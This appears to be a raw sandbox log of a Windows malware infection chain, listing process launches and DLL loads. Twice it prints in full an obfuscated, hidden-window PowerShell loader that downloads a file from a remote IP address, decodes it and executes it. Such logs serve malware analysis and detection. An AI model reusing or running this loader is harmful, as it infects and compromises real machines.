Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\SysWOW64\AtBroker.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe" Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
